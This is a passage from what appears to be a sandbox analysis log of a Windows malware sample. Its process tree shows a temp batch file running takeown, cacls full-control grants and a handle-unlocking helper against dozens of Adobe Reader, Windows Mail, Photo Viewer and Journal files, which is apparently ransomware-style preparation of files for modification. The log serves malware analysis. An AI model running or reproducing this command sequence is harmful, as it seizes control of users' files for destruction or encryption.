    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C
    3⤵
    PID:2648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "CP1257.TXT" -nobanner
    3⤵
    PID:1056
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "CP1257.TXT" -nobanner
      4⤵
      PID:2056
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:2728
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:1864
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:1248
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
  2⤵
  PID:3864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:5016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:1264
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:2312
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2956
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:4756
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:2856
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:2292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:4784
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:1320
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""
  2⤵
  PID:4912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
    3⤵
    PID:4224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "qmgr0.dat" -nobanner
    3⤵
    PID:3236
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "qmgr0.dat" -nobanner
      4⤵
      PID:3228
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3280
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:4376
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    PID:228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:3960
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:3972
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4960
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui""
  2⤵
  PID:2024
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui"
    3⤵
    PID:4016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:4740
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:2800
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui""
  2⤵
  PID:4804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3312
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui"
    3⤵
    PID:4832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:2356
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:4856
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4936
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui""
  2⤵
  PID:4868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui"
    3⤵
    PID:468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:592
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      PID:3328
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3336
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui""
  2⤵
  PID:3468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3316
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui"
    3⤵
    PID:3324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:1996
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:3992
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3376
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""
  2⤵
  PID:3916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C
    3⤵
    PID:4684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"
    3⤵
    - Modifies file permissions
    PID:4020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "blank.jtp" -nobanner
    3⤵
    PID:3508
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "blank.jtp" -nobanner
      4⤵
      PID:4808
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp""
  2⤵
  PID:2296
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G Admin:F /C
    3⤵
    PID:3952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "To_Do_List.jtp" -nobanner
    3⤵
    PID:3532
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "To_Do_List.jtp" -nobanner
      4⤵
      PID:3520
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3892
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui""
  2⤵
  PID:4056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    PID:3928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:880
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:3416
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:4104
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:4184
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:4028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    PID:4248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:4128
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:4256
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4188
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""
  2⤵
  PID:4288
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"
    3⤵
    PID:4352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "br.gif" -nobanner
    3⤵
    PID:4440
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "br.gif" -nobanner
      4⤵
      PID:4700
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4428
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""
  2⤵
  PID:4048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"
    3⤵
    PID:4380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "form_responses.gif" -nobanner
    3⤵
    PID:4540
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "form_responses.gif" -nobanner
      4⤵
      PID:4528
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""
  2⤵
  PID:4308
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "review_email.gif" -nobanner
    3⤵
    PID:4264
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "review_email.gif" -nobanner
      4⤵
      PID:4588
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4284
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""
  2⤵
  PID:4408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C
    3⤵
    PID:4580
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"
    3⤵
    PID:4660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "tr.gif" -nobanner
    3⤵
    PID:988
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "tr.gif" -nobanner
      4⤵
      PID:4640
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""
  2⤵
  PID:3044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C
    3⤵
    PID:1828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "AdobePiStd.otf" -nobanner
    3⤵
    PID:3008
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "AdobePiStd.otf" -nobanner
      4⤵
      PID:3132
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""
  2⤵
  PID:2732
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:3652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"
    3⤵
    - Modifies file permissions
    PID:2232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
    3⤵
    PID:3636
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
      4⤵
      PID:3560
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""
  2⤵
  PID:2984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
    3⤵
    PID:1240
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
      4⤵
      PID:3736
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3688
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""
  2⤵
  PID:3556
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"
    3⤵
    - Modifies file permissions
    PID:2124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "can.fca" -nobanner
    3⤵
    PID:2248
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "can.fca" -nobanner
      4⤵
      PID:3584
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1212
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""
  2⤵
  PID:4816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C
    3⤵
    PID:4828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"
    3⤵
    PID:2668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "usa03.ths" -nobanner
    3⤵
    PID:1788
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "usa03.ths" -nobanner
      4⤵
      PID:3724
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2188
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""
  2⤵
  PID:4984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
    3⤵
    PID:608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "GREEK.TXT" -nobanner
    3⤵
    PID:1300
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "GREEK.TXT" -nobanner
      4⤵
      PID:3664
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
  2⤵
  PID:3780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C
    3⤵
    PID:4736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
    3⤵
    - Modifies file permissions
    PID:3712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "CP1253.TXT" -nobanner
    3⤵
    PID:3760
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "CP1253.TXT" -nobanner
      4⤵
      PID:4932
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui""
  2⤵
  PID:1292
- - C:\Windows\SysWOW64\cacls.exe
